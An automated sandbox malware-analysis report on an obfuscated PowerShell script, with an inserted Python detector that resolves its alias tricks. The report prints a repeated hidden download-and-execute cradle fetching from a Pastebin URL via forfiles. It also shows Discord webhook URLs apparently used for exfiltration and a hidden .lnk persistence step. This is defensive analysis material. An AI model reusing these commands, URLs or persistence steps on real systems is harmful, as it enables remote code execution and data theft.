Source: powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D273000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.1871797306.000002019D273000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C791000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1652936620.000001F77E120000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.cox
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discor
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1618712133.000001F701D2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/
Source: powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, cr_asm_atCAD.ps1String found in binary or memory: https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8J
Source: powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 00000007.00000002.1800661112.000001D481725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1618712133.000001F7017B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.1800661112.000001D48038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000007.00000002.1800661112.000001D4815F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D481636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D21C000.00000004.00000800.00020000.00000000.sdmp, cr_asm_atCAD.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2

System Summary

Source: amsi64_5180.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2716.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2944, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2716, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4B06BB80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4B06C8E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFB4B04C722
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFB4B04B976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFB4B050EE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFB4B050F20
Source: amsi64_5180.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2716.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2944, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2716, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal84.troj.evad.winPS1@16/15@4/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igdi033w.a1d.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
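Added example (Python; not part of the Joe Sandbox report and not code from the sample): a resolver for the Set-Alias obfuscation in the forfiles-launched command line above, run over process-creation records constructed from the lines above. It assumes $env:os expands to Windows_NT, which holds on every NT-family host, so `sal $env:os iWr` defines an alias literally named WINDOWS_NT and `calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)` resolves to Invoke-Expression over an Invoke-WebRequest result. The benign third record, the finding names and the helper names are assumptions; the attrib record reproduces the +s +h on BeginSync.lnk seen above.

```python
"""Resolve Set-Alias (sal) obfuscation in PowerShell command lines and flag the
forfiles -> hidden PowerShell -> iex(iwr ...) chain and the attrib +s +h on a .lnk.
Records are constructed from the process-creation lines above; nothing is fetched."""
import re

# Constructed process-creation records (parent image, image, command line).
# The third record is a benign control and does not come from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\forfiles.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "-command powershell -windowstyle h -command 'sal fatbake calc;"
                "sal callit iEx; sal $env:os iWr; "
                "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\system32\attrib.exe",
     "cmdline": r'+s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"-NoProfile -Command Get-ChildItem C:\Temp"},
]

# Assumed environment: $env:os is Windows_NT on every NT-family host, which is
# what lets `sal $env:os iWr` define an alias literally named WINDOWS_NT.
ENV = {"os": "Windows_NT"}
# Built-in aliases the cradle hides behind; alias targets are chased through this map.
BUILTIN = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}

# `sal NAME TARGET` or `Set-Alias NAME TARGET`; tokens stop at whitespace or ';'.
SAL_RE = re.compile(r"\b(?:sal|set-alias)\s+([^\s;]+)\s+([^\s;]+)", re.IGNORECASE)


def expand_env(token):
    """Replace a $env:NAME token with its assumed value, else return it unchanged."""
    m = re.fullmatch(r"\$env:(\w+)", token, re.IGNORECASE)
    return ENV.get(m.group(1).lower(), token) if m else token


def resolve_aliases(cmdline):
    """Return (alias map, command line with the alias definitions removed and every
    alias use rewritten, case-insensitively, to its resolved target)."""
    aliases = {}
    for name, target in SAL_RE.findall(cmdline):
        name = expand_env(name).lower()
        target = target.strip("'\"")
        aliases[name] = BUILTIN.get(target.lower(), target)
    body = SAL_RE.sub("", cmdline)
    if aliases:
        use = re.compile(r"\b(" + "|".join(re.escape(a) for a in aliases) + r")\b",
                         re.IGNORECASE)
        body = use.sub(lambda m: aliases[m.group(0).lower()], body)
    return aliases, body


def classify(event):
    """Return (findings, resolved command line) for one process-creation record."""
    findings = []
    aliases, resolved = resolve_aliases(event["cmdline"])
    image = event["image"].lower()
    if aliases:
        findings.append("set-alias-obfuscation")
    if event["parent"].lower().endswith(r"\forfiles.exe"):
        findings.append("forfiles-proxy-launch")
    if re.search(r"-windowstyle\s+h", resolved, re.IGNORECASE):
        findings.append("hidden-window")
    # Alias-resolved download cradle: Invoke-Expression over an Invoke-WebRequest result.
    if re.search(r"invoke-expression\s*\(?\s*invoke-webrequest", resolved, re.IGNORECASE):
        findings.append("download-and-execute-cradle")
    # Hiding a shortcut with System+Hidden attributes, as done to BeginSync.lnk.
    if image.endswith(r"\attrib.exe") and ".lnk" in resolved.lower() \
            and re.search(r"\+s\b", resolved) and re.search(r"\+h\b", resolved):
        findings.append("hide-lnk-system-hidden")
    return findings, resolved


def scan(events=SAMPLE_EVENTS):
    """Classify every record; return only those with findings."""
    hits = []
    for ev in events:
        findings, resolved = classify(ev)
        if findings:
            hits.append({"image": ev["image"], "findings": findings, "resolved": resolved})
    return hits


if __name__ == "__main__":
    for hit in scan():
        print(hit["image"], hit["findings"])
        print("   ", hit["resolved"])
```

The alias map is built before any use is rewritten, so the same logic handles chains like `sal a iex; sal b a` only if the chase is extended; for this sample a single pass through BUILTIN is enough. Matching on the resolved command line rather than the raw one is the point: a rule keyed on the literal string "iex" or "Invoke-WebRequest" never sees either in the original process-creation event.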
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, policymanager.dll, msvcp110_win.dll, taskflowdataengine.dll, wintypes.dll, cdp.dll, umpdc.dll, dsreg.dll, cryptsp.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, rsaenh.dll, cryptbase.dll, amsi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, urlmon.dll, iertutil.dll, netutils.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, ondemandconnroutehelper.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\forfiles.exe | Sections loaded, in order: version.dll
Source: C:\Windows\System32\attrib.exe | Sections loaded, in order: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
Source: C:\Windows\System32\forfiles.exe | Sections loaded, in order: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: BeginSync.lnk.0.dr | LNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb< source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb4000052534131000400000100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdb& source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbR, source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbP/,K source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1864209009.000002019A767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdbi source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb6K source: powershell.exe, 0000000C.00000002.1943252359.00000201B4A11000.00000004.00000020.00020000.00000000.sdmp
